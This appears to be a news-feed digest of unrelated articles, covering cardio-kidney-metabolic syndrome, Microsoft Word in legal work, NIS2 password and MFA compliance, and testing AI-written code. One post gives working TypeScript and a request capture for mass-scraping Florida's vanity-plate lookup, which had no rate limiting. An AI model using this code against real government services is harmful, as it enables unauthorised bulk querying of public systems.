Not seeing these connections creates dangers for patients like Bies. “What we’ve done to date is really look individually across one or two organs to see abnormalities,” says nephrologist Nisha Bansal of the University of Washington. And those narrow views have led doctors to treat the different elements of CKM as separate, isolated problems.

For instance, doctors have often used clinical algorithms to figure out a patient’s risk of heart failure. But in a 2022 study, Bansal and her colleagues found that one common version of this tool does not work as well in people with kidney disease. As a result, those who had kidney disease—who are twice as likely to develop heart disease as are people with healthy kidneys—were less likely to be diagnosed and treated in a timely manner than those without kidney ailments.

In another study, researchers found that among people with type 2 diabetes—one in three of whom are likely to develop chronic kidney disease—fewer than one quarter were receiving the kidney disease screening recommended by the American Diabetes Association and KDIGO, a nonprofit group that provides guidelines for global improvements in kidney health.

At present, around 59 million adults worldwide have diabetes, about 64 million are diagnosed with heart failure, and approximately 700 million live with chronic kidney disease. Collectively, these illnesses are the leading cause of death in dozens of countries; the evidence for CKM indicates that the several epidemics may in fact be one.

Playing cards featuring a kidney illustration — Jennifer N. R. Smith

One of the first pushes for treating these diseases together came in the late 2000s. That’s when Cleveland Clinic cardiologist Steven Nissen was scouring a database from a pharmaceutical company that listed its drug tests, in search of clinical trials of a diabetes drug named rosiglitazone. Across 42 trials, Nissen found, the data revealed a clear increase in heart attacks with the use of the drug. If the drug reduced diabetes, accompanying heart trouble should have gone down, not up, he thought.

A Senate investigation followed this vein of evidence and led to a 2007 advisory panel convened by the U.S. Food and Drug Administration. The discussions brought about a transformational change in how diabetes drugs were approved: It was no longer enough to simply show an improvement in blood glucose. Pharmaceutical companies would also need to demonstrate that the drugs were not linked to increased chances of developing heart health issues. Clinical trials to test the drugs would need to include people at high risk of heart or blood vessel diseases, including older adults.

Nissen recalls immense opposition to the idea and concern that the bar had been set too high. Those fears were not unfounded—many large pharmaceutical companies “abandoned the search for diabetes drugs” because the trials would take longer to complete and cost more, according to endocrinologist Daniel Drucker of the Lunenfeld-Tanenbaum Research Institute in Toronto. “The pharma industry was 100 percent worried about this,” Drucker says.

Drucker, who at the time was studying a promising new group of drugs for diabetes, was concerned about the extra time and expense, too. But in preliminary experiments, the scrutiny for additional conditions began to pay off. In 2008, at about the same time the fda updated its guidance on diabetes drugs, Drucker and other researchers discovered that the new molecules they were investigating seemed to protect mice and rats from heart disease.

“There’s not going to be a one-size-fits-all approach to all of this.” —Nisha Bansal, nephrologist

The new drugs mimicked a small protein named GLP-1, which normally regulates blood sugar and digestion. Small studies suggested it had wider benefits and might protect heart function in people who were hospitalized after a heart attack and angioplasty. At the time, these GLP-1 mimics were being used only as diabetes treatments. But studies in animals suggested they could do more, and subsequent trials in people showed the drugs also protected heart and kidney function. “We might not have discovered these actions of GLP-1 for some time if we hadn’t been directed by the fda to really study this,” Drucker says. “In hindsight, it worked out very well.”

The regulations ended up leading to very successful multifaceted drugs. In 2013, the year that Bies had her heart attack, the fda approved the first of a group of medications that act to block a receptor known as SGLT2 in the kidneys. These so-called SGLT2 inhibitors are “almost a wonder drug,” says nephrologist Dominic Raj of George Washington University.

In a series of stunning, large trials, researchers established that these drugs lowered blood glucose, delayed the worsening of kidney disease, and were strongly correlated with reduced risk of several cardiac conditions. These studies also confirmed that cardiac, kidney and metabolic diseases are “more closely linked than we anticipated,” Bansal says. “The SGLT2 trials were really a landmark in this.”

GLP-1-mimicking drugs such as Wegovy have been similar changemakers. A clinical trial of GLP-1 medications was stopped early because the benefits were so overwhelming that it was unethical to continue giving a placebo to patients in a comparison group. In 2024 researchers compared one drug with a placebo in more than 3,500 participants with type 2 diabetes and chronic kidney disease. But instead of looking only at diabetes improvement, they examined kidney and heart conditions as well. The scientists found an 18 to 20 percent lower risk of death in those treated with the GLP-1 drug.

Although the GLP-1 medicines do have side effects (nausea and vomiting are some), within a few short years clinicians found that they had therapies that were designed to protect one organ but also treated others. “Now we have excellent evidence to say that not only will you have better control of your diabetes, and not only will these medicines help you lose weight, but they will prevent or attenuate the risk of developing serious heart disease and serious kidney disease,” Drucker says.

Playing cards featuring an illustration of a pancreas — Jennifer N. R. Smith

Bies’s physician prescribed her the GLP-1 receptor agonist drug Ozempic in 2024. Two months after she began the treatment, her blood glucose levels dipped below the diabetic range. Her heart is healthier, too. Doctors are “very happy with where my numbers are,” she says. And with fewer drugs in her system, Bies feels much better overall.

N ot everyone is convinced that the CKM syndrome framework is necessary. Nissen, for one, says it is “a rebranding of a very old concept.” The symptoms and health risks linked to CKM overlap significantly with those of metabolic syndrome, an older term used to describe a similar constellation of health risks, he says.

Ndumele, however, disagrees with that characterization. “Although they are clearly related, CKM syndrome and metabolic syndrome have some very important differences,” he says. For one, the CKM framework encompasses more disease states. And clinicians can use the concept to identify different stages of risk: very early warning signs followed by clinical conditions—including but not limited to metabolic syndrome—and ultimately late stages of CKM, which include full-blown heart and kidney disease. “This is meant to better support prevention across the life course,” Ndumele says. Ongoing studies are testing new ways to identify those at risk of CKM early on and help with preventive care.

Patients such as Bies agree that combining care for the diseases that make up CKM could save lives. For decades she and countless other patients have struggled to manage different aspects of their health. Bies remembers that although all her doctors were affiliated with the same hospital, they didn’t communicate with one another or see others’ notes about her prescriptions.

A few years ago Bies joined an American Heart Association advisory committee on CKM to inform clinicians and advocate for others who deal with this complex illness, in hopes that speaking up about her own traumatic journey might help others so that “somebody else won’t have to wait 10 to 12 years to advocate for themselves,” she says.

At the University of Washington, Bansal and her colleagues are testing an integrated care model in which patients meet with multiple specialists at the same time to chart out their care. It is, she says, a work in progress. “How do we actually improve the rates of screening and disease recognition and get more people who are eligible on therapies to treat CKM disease?” Bansal says. “Although there have been a lot of exciting advances, we’re only at the beginning. Integrating care is always a challenge.”

Such integrations are critical to help with early diagnosis—a crucial step in squelching the rise of CKM around the world, according to Ndumele. In the future, even more specialties may need to coordinate. New research already hints at the involvement of other organs and organ systems. Cardiologist Faiez Zannad of the University of Lorraine in France suspects that as researchers glean a clearer picture, CKM syndrome will further expand to include liver disease. Zannad is investigating liver damage in heart patients because it is another common fallout of the same disease mechanisms.

Researchers and patients caution, however, that the move to group different diseases into CKM should not hinder efforts to understand each condition. Each person’s course of disease—their initial diagnosis, the complications they are at greatest risk of developing and how best to treat them—can vary. “It’s a very broad syndrome, and there will be nuances in terms of understanding subgroups, what the mechanisms are, and how we diagnose and treat patients,” Bansal says. “There’s not going to be a one-size-fits-all approach to all of this.”

[$] Episode 29 of the Dirk and Linus show

Linux Weekly News

lwn.net

2025-12-18 15:17:22

Linus Torvalds is famously averse to presenting prepared talks, but the wider community is always interested in what he has to say about the condition of the Linux kernel. So, for some time now, his appearances have been in the form of an informal conversation with Dirk Hohndel. At the 2025 Open S...

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The immortality of Microsoft Word

Hacker News

theredline.versionstory.com

2025-12-18 15:11:06

Comments...

Original Article

Lawyers and legal tech procurers often feel that vendors don’t ‘get it.’ They don’t understand what lawyers need and they build solutions for problems that lawyers don’t have. A tsunami of venture capital in the space has only amplified this dynamic. If you’ve spent time in r/legaltech in recent months, you’re surely aware of the shared frustration by both lawyers and legal tech procurers that this new crop of legal AI companies have over-promised and under-delivered.

Why is it easier for tech people to build machines that emulate human intelligence than it is for them to build software for lawyers that delivers value? As a software engineer who has spent the past five years working in legal tech, I have observed several patterns in products that miss the mark and in my own thinking that I believe explain the disconnect between lawyers and legal tech vendors.

My conclusion is that coders misunderstand legal workflows and that their misunderstanding is upstream of many mistakes in legal tech .

Of all the mistakes this misunderstanding produces, one stands above the rest—the desire to replace Microsoft Word.

Microsoft Word can never be replaced. OpenAI could build superintelligence surpassing human cognition in every conceivable dimension, rendering all human labor obsolete, and Microsoft Word will survive. Future contracts defining the land rights to distant galaxies will undoubtedly be drafted in Microsoft Word.

Microsoft Word is immortal.

Why?

Legal systems around the world run on it. Microsoft Word is the only word processor on the market that meets lawyer’s technical requirements. Furthermore, its file format, docx, is the network protocol that underpins all legal agreements in society. Replacing Microsoft Word is untenable and attempts to do so deeply misunderstand the role that it plays in lawyers’ workflows.

The origin of this misunderstanding can be traced to a common myth shared by coders — “The Fall of Legal Tech.”

Throughout history, ancient cultures across the world developed myths about the creation and fall of mankind that mirror one another. So too do coders, drawing from the collective unconscious of the coder hive-mind, invent the myth of “The Fall of Legal Tech”. They mistakenly conclude that Microsoft Word is legal tech’s original sin and only its replacement will lead lawyers to salvation.

They have a variety of ideas of what form its successor will take. Some imagine it’s Google Docs . Others believe it will be their product’s proprietary rich text editor. The coders most committed to the ideals of technical elegance, however, propose that Markdown , a computer language for encoding formatted text, shall take its place .

Markdown is ubiquitous amongst coders. It allows them to encode document formatting in “plaintext”. Special characters encode its text so that applications can render it with visual formatting. For example, to indicate that text should be italicized, Markdown wraps it in asterisks. E.g. *This text will be italic* -> this text will be italic.

Below is an example of a simple Markdown document with its written form on the left and its rendered form on the right.

The left side shows Markdown in text format while the right side shows it rendered

Why do coders want lawyers to use Markdown instead of Microsoft Word? Because Markdown is compatible with git, the version control system that structures their workflow. If lawyers could use git-like version control, so many problems in the legal workflow could be solved. It’s why we’ve spent years building such a system for lawyers . Let’s get into why Markdown is not legal tech’s savior.

Sign up for Version Story

Markdown doesn’t work because of formatting. “But Markdown supports formatting!” the coder cries. That is, in fact, its whole point — the raison d’etre of Markdown is to encode formatting in text. Isn’t that enough?

Well yes, Markdown supports certain formatting. It supports bold, italics, numbered lists, ordered lists, headings, tables, etc. But what happens when a lawyer wants to style their headings in “small caps”, as my lawyer cofounder Kevin insists ? Okay, perhaps we can add that formatting option to Markdown as well. But what happens when a law firm needs their documents to use multi-level decimal clause numbering like in the below screenshot?

Every law firm has specific requirements regarding list formatting

Or how about when we need to specify the precise width of a column in a table that differs from the width of the other columns or split a particular cell to contain additional rows that other cells don’t?

Complex table structures are common in legal documents

Sure, we could theoretically encode that rule too and all other formatting rules until we’ve accounted for all of the formatting possibilities that lawyers actively use. By that point, however, we will have effectively recreated Microsoft Word but in a format that is significantly more challenging to use.

Surely, many coders who have read up until this point are thinking the following objection: why do lawyers need all of those extra formatting options? The styling properties of lists don’t matter – all that matters is the information they convey.

Herein lies a cultural difference between the fields of coding and lawyering. For coders, visual aesthetics don’t matter. For lawyers, they are a technical requirement. While this difference may seem arbitrary on the surface, it is downstream of a critical technical difference between the two fields. Machines interpret the work of coders. Human institutions interpret the work of lawyers.

Concretely, visual presentation doesn’t matter for code beyond basic legibility because a machine ultimately executes the code. Courts interpret legal contracts, by contrast, and courts often have specific formatting guidelines that Markdown and other non-Word alternatives do not satisfy .

For example: federal appellate courts require all “ briefs, appendices, and other papers ” to adhere to the following formatting conventions:

14-point proportional typeface is mandatory, and Markdown cannot specify font size or font family.

Double-spacing for all text, with narrow exceptions for block quotes and headings. Markdown has no concept of line-spacing rules.

Precise margin requirements (at least one-inch on all sides) and 8.5×11-inch page size, which Markdown cannot express.

Roman-numeral and Arabic page-numbering schemes, footers, and separate formatting for cover pages, none of which Markdown can natively encode.

Additionally, a well-formatted document is a symbol of a lawyer’s professionalism. Courts aren’t the only readers of legal documents. Clients, counterparties, colleagues, all read a lawyer’s documents as well. The style of their work product reflects the lawyer’s professionalism — the medium is the message.

Beyond styling considerations, another structural consideration of the legal workflow prevents Microsoft Word’s defenestration — the legal system is decentralized.

If a coder wants to adopt a new file format for their internal documentation or new programming language, they can rewrite the relevant parts of their codebase. They are able to do so by virtue of having autonomy over the system they operate. While this becomes more complex in an engineering organization, the principle remains that the organization has the necessary autonomy to change its systems.

In the legal world, a lawyer cannot simply choose to adopt a new file format. This is because all existing legal precedent is in the old format . Docx encodes virtually every outstanding legal commitment for every person and corporation in our society. A lawyer could choose to adopt a new file format, but the system will break when they need to redline it against precedent.

Additionally, every colleague, counterparty, outside-counsel, and client a lawyer ever works with uses docx. To introduce a new format into this ecosystem would introduce friction into every single interaction. If a lawyer sends a contract in Markdown, the counterparty cannot redline it. If they send a link to a proprietary cloud editor, the client cannot file it in their internal document management system. In the legal industry, asking a client to learn a new tool to accommodate your workflow is a non-starter.

An appropriate technical analogy for docx is a network protocol. A coder cannot just decide to stop serving their web application over HTTP. Doing so would disconnect their application from the web and render it useless. The same goes for lawyers vis-a-vis docx. Docx is a protocol for defining legal commitments across a decentralized network of legal entities. Opting out of that system is not viable if the lawyer wants to stay in business.

This dynamic explains why legal tech products fail when they force lawyers to use a document editor outside of Microsoft Word. They attempt to introduce a walled-garden platform in an industry that runs on an open protocol. When a tech product requires both sides of a transaction to be on the same platform to collaborate effectively, it breaks the protocol. Until a startup can convince the entire global legal market to switch software simultaneously, .docx remains the only viable packet for transferring legal data.

Accepting Microsoft Word’s primacy in the legal workflow is not technological defeatism. Progress shall continue! But impactful innovation in legal tech requires contending with Microsoft Word. Moreover, it requires cultivating a deep understanding of the practice of law beyond a surface-level recognition of the similarities between coders and lawyers.

At Version Story, this understanding originates from our lawyer/coder CEO, Kevin O’Connell. His experience in both fields has given us a unique vantage point in the industry, allowing us to understand the legal workflow as it exists while imagining what it can become. That vantage point has been critical in building a version control and redlining product that lawyers love.

Sign up for Version Story

If more coders and technologists learn the way lawyers actually work, we can expect a future with innovative legal technology that truly adds value. Not revolutions, not ChatGPT wrappers promising to remove lawyering from the practice of law, but meaningful step-changes that help lawyers to spend more time exercising legal judgment and less time wrangling documents.

Legal tech never fell. It doesn’t need full-stop salvation. It needs good products built by people who understand lawyers.

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NIS2 compliance: How to get passwords and MFA right

Bleeping Computer

www.bleepingcomputer.com

2025-12-18 15:01:11

NIS2 puts identity and access controls under the spotlight, with weak passwords and poor authentication now a compliance risk. Specops Software explains how to align password policies and MFA with NIS2 requirements. [...]...

Original Article

NIS2 compliance header

The EU's NIS2 Directive is pushing organizations to take cybersecurity seriously, and that means looking closely at how you manage access. If you're responsible for security in a company that falls under NIS2, you're probably asking: what exactly do I need to do about passwords and authentication?

Let's break down what NIS2 means for your identity and access controls, and how to build a practical roadmap that actually works.

What is NIS2 and who must comply?

NIS2 (the Network and Information Security Directive) replaced the original NIS Directive in January 2023, and EU member states were required to transpose it into national law by October 2024. The directive applies to medium and large organizations across 18 critical sectors, including energy, transport, banking, healthcare , digital infrastructure, and public administration.

If your organization has 50+ employees or annual revenue exceeding €10 million in these sectors, you likely need to comply. The penalties for non-compliance are steep: essential entities face fines up to €10 million or 2% of global annual turnover, while important entities face up to €7 million or 1.4% of turnover.

Essential vs. Important: Entities explained

NIS2 classifies organizations into two categories:

Essential entities: Large organizations in high-criticality sectors (Annex I) like energy, banking, healthcare, and digital infrastructure. These face proactive supervision with regular audits and maximum fines of €10 million or 2% of global annual turnover, whichever is higher.
Important entities: Organizations in other critical sectors (Annex II) like postal services, waste management, and food production. These face ex-post supervision (only monitored after non-compliance is reported) and maximum fines of €7 million or 1.4% of global annual turnover.

Both categories must meet the same cybersecurity requirements. The difference lies in supervision intensity and penalty levels.

Why identity and access controls matter under NIS2

NIS2 explicitly calls out identity and access management as a core security measure. Article 21 requires organizations to implement policies on access control, making it clear that weak authentication is no longer acceptable.

This makes sense when you consider the threat landscape. According to the 2024 Verizon Data Breach Investigations Report , compromised credentials were involved in 80% of breaches. If attackers can walk through the front door with stolen passwords , your other security measures don't matter much.

Getting password policy right

Strong password policy is your first line of defense, but what does "strong" actually mean as we move into 2026?

Complexity vs. Length

The old model of forcing users to create "P@ssw0rd123!" is outdated. NIST guidelines now recommend prioritizing length over complexity. A 15-character passphrase such as "coffee-mountain-bicycle-sky" is both more secure and easier to remember than "Tr0ub4dor&3."

For NIS2 compliance, implement these baseline requirements:

Minimum password length of 15 characters
Screen passwords against known breach databases
Block common patterns and dictionary words
Ban password reuse across critical systems

The password rotation question

Mandatory password rotation every 60-90 days used to be standard practice. Not anymore. Forced rotation encourages users to make predictable changes ("Password1" becomes "Password2") or write passwords down.

Current best practice: skip mandatory rotation unless you have evidence of a compromise. Instead, invest in breach monitoring and prompt users to change passwords when their credentials appear in known data breaches .

The human factor in password security

Technical controls only work if users can actually follow them . If your policy is so restrictive that people resort to "password123" with minor variations, you haven't improved security; you've just checked a box.

MFA: Moving from optional to essential

NIS2 doesn't explicitly mandate multi-factor authentication in the directive text, but national implementations and ENISA guidance make it clear: MFA is expected for privileged access and highly recommended for all users accessing critical systems.

The logic is straightforward. Even if credentials are compromised, MFA creates a second barrier. Microsoft reports that MFA blocks 99.9% of automated attacks on user accounts. However, not all MFA methods are equal: it’s important to prioritize factors that are resistant to phishing and prompt bombing.

Your NIS2 compliance roadmap

Here's a practical checklist to align your authentication controls with NIS2:

Policy foundations

Audit your current password policies (try our free read-only tool, Specops Password Auditor ) and update them to modern standards
Deploy a password management solution that enforces length and complexity requirements
Establish regular access reviews for privileged accounts

Credential-based attacks defense

Use a tool like Specops Password Policy to continuously scan your AD against billions of unique compromised passwords
Roll out phishing-resistant MFA starting with privileged users
Enable conditional access policies that adjust requirements based on risk

User enablement

Follow best practices when rolling out new password policies
Train users on password best practices (passphrases, password managers)
Communicate the "why" behind new requirements; compliance works better when users understand the risks

Ongoing compliance operations

Monitor authentication logs for suspicious activity
Review and update policies quarterly
Test incident response procedures annually
Document everything for audit readiness

NIS2 compliance roadmap

Making it work with the right tools

NIS2 compliance isn't about buying every security product on the market; it's about making smart choices that improve security without overwhelming your team. NIS2 gives you a framework for building authentication controls that actually protect your organization. Start with password policies , add phishing-resistant MFA , and build processes that scale.

Need support meeting NIS2 compliance? Speak to a Specops expert about how to meet your unique challenges .

Sponsored and written by Specops Software .

Using TypeScript to Obtain One of the Rarest License Plates

Hacker News

www.jack.bio

2025-12-18 15:00:32

Comments...

Original Article

Most people never think twice about the random mix of letters and numbers the DMV assigns them.

I’m not one of those people.

Online, I’ve always chased having a clean and memorable digital identity. Over the years, I’ve been able to pick up handles like my first + last name on Instagram (@jlaf) and full words across platforms (@explain, @discontinue). So when the DMV mailed me my third reminder to renew my registration, that same instinct kicked in: why hadn’t I considered getting a distinctive plate combination of my own?

In the world of license plates exists a rarity hierarchy:

Single number license plates (10 possible)
Repeating number license plates (10 possible)
Single letter license plates (26 possible)
Repeating letter combinations (??? possible)
Two letter plate combinations (676 possible)

After some research about the history these rare plates, my curiosity got the best of me. How rare could you really go? And how far can you push a state's public lookup tools to find out?

PlateRadar & the Monopoly

As it stands right now, there's a single resource to find mass information on license plate availability: PlateRadar. PlateRadar, like any smart website, recognizes that this data is definitely worth something to someone - and as a result, hides any information that might be deemed rare behind a 20 dollar a month paywall. The site also refreshes every 24 hours, and from my history with rare usernames I know that time is of the absolute essence when snagging something rare. 24 hours wasn't going to cut it.

Unfortunately for PlateRadar, I'm an engineer and not a normal human being, so I decided to dig in on how vanity plates are deemed available or unavailable.

Florida's Vanity Plate Checker

Florida, unlike some states (!), provides a website that allows you to check a license plate configuration (meaning the custom sequence of letters/numbers that you want printed on your plate) before you waste your time sitting in line at the tax collector's office. The tool also provides the plate types that support that combination, as different plates also allow different character limits (for example, some only permit 5 characters while allow others up to 7 characters).

Thankfully, the site had the nifty feature to check more than a single combination at a time, with no additional delay in the request. I was submitting some combinations manually before realizing that I was able to make requests pretty fast manually - so what if I just automated this whole process?

The Rate is Limitless

I fired up Burp Suite and proxied a request to the service. What came through looked like this:

POST https://services.flhsmv.gov/mvcheckpersonalplate/ HTTP/1.1
__VIEWSTATE=/wEPDwULLTE2Nzg2NjE0NDgPZBYCZg9kFgICAw9kFgICAQ9kFgwCBQ8PFgIeBFRleHQFCUFWQUlMQUJMRWRkAgcPDxYCHgdWaXNpYmxlZ2RkAgsPDxYCHwAFASBkZAIRDw8WAh8ABQEgZGQCFw8PFgIfAAUBIGRkAh0PDxYCHwAFASBkZGQZj5Nowpt7uQW4i5K8gYM8k2+WSv9Zz0wpvFKj57zF0w==
__VIEWSTATEGENERATOR=0719FE0A
__EVENTVALIDATION=/wEdAAlM0TkirL0XIlY9Dw0k/5tSphigSR1TLsx/PgGne7pkToFkrQPgalhmo+FySJy6U4iQeyzYgJga2PpZFeMkYbpKuFA0Lbs4tsi+aCEe29qpNhTkiCU5GKYk9WuPyhuiSM5sZFBTNc+Q1lCok0SfYOt8+CHI2KGhrgOke/DbhB4LDccabLrTZbd0ckqhWOrhQ2MjwxuXnk/njUGbYQbYHdP4Ds+OFyUVKVe45DGbH/0quQ==
ctl00$MainContent$txtInputRowOne=MYPLATE
ctl00$MainContent$txtInputRowTwo
ctl00$MainContent$txtInputRowThree
ctl00$MainContent$txtInputRowFour
ctl00$MainContent$txtInputRowFive
ctl00$MainContent$btnSubmit=Submit

__VIEWSTATE , __VIEWSTATEGENERATOR , and __EVENTVALIDATION immediately tipped me off that this was an ASP.NET Web Form. Granted, this is a government website, so honestly, what else was I expecting?

EVENTVALIDATION is (was?) a novel security measure implemented in 2006 by the ASP.NET team to "prevents unauthorized requests sent by potentially malicious users from the client [..] to ensure that each and every postback and callback event originates from the expected user interface elements, the page adds an extra layer of validation on events".

In practice, it's meant to stop forged form submissions, which theoretically sounds like a scraping killer. If I had to fetch a fresh set of these variables before making any form of a request, I'd quickly overwhelm the system with round-trips and get rate-limited almost immediately.

... except there was no ratelimiting. At all.

See, the website had absolutely zero CAPTCHA, IP ratelimiting, or web application firewall stopping an influx of requests from coming in. I quickly verified this by using Burp Repeater to make a number of null payload requests, which all returned a status code of 200 Successful.

Once I realized this, I quickly threw a script together to automate the entire process. The workflow looks something like this:

Fetch the page once using real browser headers, which loads the ASP.NET form and gives me __VIEWSTATE , __VIEWSTATEGENERATOR and __EVENTVALIDATION - and the power to make a legitimate POST request.
Extract the values from the form using a Regex helper.

function extractFormFields(html: string): {
viewState: string;
viewStateGenerator: string;
eventValidation: string;
} {
const viewStateMatch = html.match(/id="__VIEWSTATE"\s+value="([^"]+)"/);
const viewStateGeneratorMatch = html.match(
/id="__VIEWSTATEGENERATOR"\s+value="([^"]+)"/
);
const eventValidationMatch = html.match(
/id="__EVENTVALIDATION"\s+value="([^"]+)"/
);
if (!viewStateMatch || !viewStateGeneratorMatch || !eventValidationMatch) {
throw new Error("Failed to extract required form fields from page");
}
return {
viewState: viewStateMatch[1],
viewStateGenerator: viewStateGeneratorMatch[1],
eventValidation: eventValidationMatch[1],
};
}

Build the POST request with all necessary fields. The actual plate combinations were submitted through ctl00$MainContent$txtInputRowXXX , where XXX was one through five . Using this let me check plate availability 5x faster - and when checking thousands of license plate combinations at a time, it definitely matters.

function buildFormData(
plates: string[],
viewState: string,
viewStateGenerator: string,
eventValidation: string
): string {
const params = new URLSearchParams();
params.append("__VIEWSTATE", viewState);
params.append("__VIEWSTATEGENERATOR", viewStateGenerator);
params.append("__EVENTVALIDATION", eventValidation);
const fieldNames = [
"ctl00$MainContent$txtInputRowOne",
"ctl00$MainContent$txtInputRowTwo",
"ctl00$MainContent$txtInputRowThree",
"ctl00$MainContent$txtInputRowFour",
"ctl00$MainContent$txtInputRowFive",
];
for (let i = 0; i < 5; i++) {
params.append(
fieldNames[i],
i < plates.length ? plates[i].toUpperCase() : ""
);
}
params.append("ctl00$MainContent$btnSubmit", "Submit");
return params.toString();
}

Submit the POST request and parse the body! Thankfully, the site returned a big ol' AVAILABLE or NOT AVAILABLE for each plate combo, so that was easy enough to check in code:

function extractPlateStatuses(
html: string,
plates: string[]
): PlateCheckResult[] {
const results: PlateCheckResult[] = [];
const labelIds = [
"MainContent_lblOutPutRowOne",
"MainContent_lblOutPutRowTwo",
"MainContent_lblOutputRowThree",
"MainContent_lblOutputRowFour",
"MainContent_lblOutputRowFive",
];
for (let i = 0; i < plates.length; i++) {
const labelId = labelIds[i];
const regex = new RegExp(`id="${labelId}"[^>]*>([^<]*)<`, "i");
const match = html.match(regex);
const status = match ? match[1].trim() : "";
const available = status.toUpperCase() === "AVAILABLE";
results.push({
plate: plates[i],
available,
status: status || "UNKNOWN",
});
}
return results;
}

The Plate War of '25

Once the script was running smoothly, I created a small microservice that added the results to a Postgres database with the plate combination, along with the last time it was checked. For smaller, high-value combinations (eg, any of the single letter / double letter combinations), I constantly polled every hour or two to check availability. What I didn't realize at the time was the system updated in real time. The moment someone reserved a plate, the Florida DMV's backend reflected the change on the next lookup.

To visualize the data I had scraped, I built a quick Next.js frontend that let me browse through results, filter combinations, and batch-upload plate lists from a text file for quick checking.

I found some really cool plate combinations, like WEBSITE , SITE , and CAPTCHA . But nothing compared to the spotting one of the only remaining two-letter combination I had seen during my search: EO .

I saw that EO was available on November 26th. With Thanksgiving, Black Friday, and the entire weekend shutting down state offices, I assumed I had plenty of time to stroll into the Tax Collector’s office and grab it.

December 1st rolled around and I hopped in my car at 9:30am to head towards the tax collector's office. While driving, I got a notification from my service that EO was no longer available. Someone had the same idea as me, and clearly must have arrived when their doors opened right at 8am. I turned the car around, defeated, and went home.

When I had gotten home, out of spite (and curiosity) I decided to re-run a full check on all two letter license plates.

Just like that, by some weird divine timing alignment, another two-letter combination had popped back into availability.

My wallowing quickly ended, and I got right back in my car and drove straight to the office. After almost an hour long wait (and a conversation with a slightly confused but very patient office clerk listening to my explanation), I was able to make the reservation. HY was officially my license plate.

I’d show you a picture, but unfortunately Florida runs on a 60-day delivery timeline for custom plates. Still: it exists, it’s paid for, and it’s proof that with a little TypeScript and an unreasonable amount of determination, you can claim just about anything.

Your job is to deliver code you have proven to work

Hacker News

simonwillison.net

2025-12-18 14:52:11

Comments...

Original Article

18th December 2025

In all of the debates about the value of AI-assistance in software development there’s one depressing anecdote that I keep on seeing: the junior engineer, empowered by some class of LLM tool, who deposits giant, untested PRs on their coworkers—or open source maintainers—and expects the “code review” process to handle the rest.

This is rude, a waste of other people’s time, and is honestly a dereliction of duty as a software developer.

Your job is to deliver code you have proven to work.

As software engineers we don’t just crank out code—in fact these days you could argue that’s what the LLMs are for. We need to deliver code that works —and we need to include proof that it works as well. Not doing that directly shifts the burden of the actual work to whoever is expected to review our code.

How to prove it works

There are two steps to proving a piece of code works. Neither is optional.

The first is manual testing . If you haven’t seen the code do the right thing yourself, that code doesn’t work. If it does turn out to work, that’s honestly just pure chance.

Manual testing skills are genuine skills that you need to develop. You need to be able to get the system into an initial state that demonstrates your change, then exercise the change, then check and demonstrate that it has the desired effect.

If possible I like to reduce these steps to a sequence of terminal commands which I can paste, along with their output, into a comment in the code review. Here’s a recent example .

Some changes are harder to demonstrate. It’s still your job to demonstrate them! Record a screen capture video and add that to the PR. Show your reviewers that the change you made actually works.

Once you’ve tested the happy path where everything works you can start trying the edge cases. Manual testing is a skill, and finding the things that break is the next level of that skill that helps define a senior engineer.

The second step in proving a change works is automated testing . This is so much easier now that we have LLM tooling, which means there’s no excuse at all for skipping this step.

Your contribution should bundle the change with an automated test that proves the change works. That test should fail if you revert the implementation.

The process for writing a test mirrors that of manual testing: get the system into an initial known state, exercise the change, assert that it worked correctly. Integrating a test harness to productively facilitate this is another key skill worth investing in.

Don’t be tempted to skip the manual test because you think the automated test has you covered already! Almost every time I’ve done this myself I’ve quickly regretted it.

Make your coding agent prove it first

The most important trend in LLMs in 2025 has been the explosive growth of coding agents —tools like Claude Code and Codex CLI that can actively execute the code they are working on to check that it works and further iterate on any problems.

To master these tools you need to learn how to get them to prove their changes work as well.

This looks exactly the same as the process I described above: they need to be able to manually test their changes as they work, and they need to be able to build automated tests that guarantee the change will continue to work in the future.

Since they’re robots, automated tests and manual tests are effectively the same thing.

They do feel a little different though. When I’m working on CLI tools I’ll usually teach Claude Code how to run them itself so it can do one-off tests, even though the eventual automated tests will use a system like Click’s CLIRunner .

When working on CSS changes I’ll often encourage my coding agent to take screenshots when it needs to check if the change it made had the desired effect.

The good news about automated tests is that coding agents need very little encouragement to write them. If your project has tests already most agents will extend that test suite without you even telling them to do so. They’ll also reuse patterns from existing tests, so keeping your test code well organized and populated with patterns you like is a great way to help your agent build testing code to your taste.

Developing good taste in testing code is another of those skills that differentiates a senior engineer.

The human provides the accountability

A computer can never be held accountable . That’s your job as the human in the loop.

Almost anyone can prompt an LLM to generate a thousand-line patch and submit it for code review. That’s no longer valuable. What’s valuable is contributing code that is proven to work .

Next time you submit a PR, make sure you’ve included your evidence that it works as it should.

Your job is to deliver code you have proven to work

Simon Willison

simonwillison.net

2025-12-18 14:49:38

In all of the debates about the value of AI-assistance in software development there's one depressing anecdote that I keep on seeing: the junior engineer, empowered by some class of LLM tool, who deposits giant, untested PRs on their coworkers - or open source maintainers - and expects the "code rev...